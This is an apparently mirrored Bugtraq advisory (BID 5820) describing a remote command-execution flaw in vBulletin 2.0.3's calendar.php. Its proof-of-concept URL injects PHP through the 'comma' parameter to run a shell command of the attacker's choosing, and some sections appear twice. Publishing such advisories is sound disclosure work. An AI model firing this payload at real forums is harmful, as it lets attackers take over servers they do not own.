VBulletin Calendar.PHP Command Execution Vulnerability
BID:5820
Info
VBulletin Calendar.PHP Command Execution Vulnerability
| Bugtraq ID: | 5820 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 27 2002 12:00AM |
| Updated: | Sep 27 2002 12:00AM |
| Credit: | Discovery of this vulnerability credited to <[email protected]>. |
| Vulnerable: |
VBulletin VBulletin 2.0.3 |
| Not Vulnerable: |
VBulletin VBulletin 2.2 .0 |
Discussion
VBulletin Calendar.PHP Command Execution Vulnerability
A remote command execution vulnerability has been reported for vBulletin. The vulnerability is due to vBulletin failing to properly sanitize user-supplied input from URI parameters.
An attacker can exploit this vulnerability to execute malicious commands on the vulnerable system.
A remote command execution vulnerability has been reported for vBulletin. The vulnerability is due to vBulletin failing to properly sanitize user-supplied input from URI parameters.
An attacker can exploit this vulnerability to execute malicious commands on the vulnerable system.
Exploit / POC
VBulletin Calendar.PHP Command Execution Vulnerability
The following proof of concept example has been made available:
http://www.example.com/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60<command>%20%60;die();echo%22
where <command> signifies a command to be executed on the system.
The following proof of concept example has been made available:
http://www.example.com/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60<command>%20%60;die();echo%22
where <command> signifies a command to be executed on the system.
Solution / Fix
VBulletin Calendar.PHP Command Execution Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.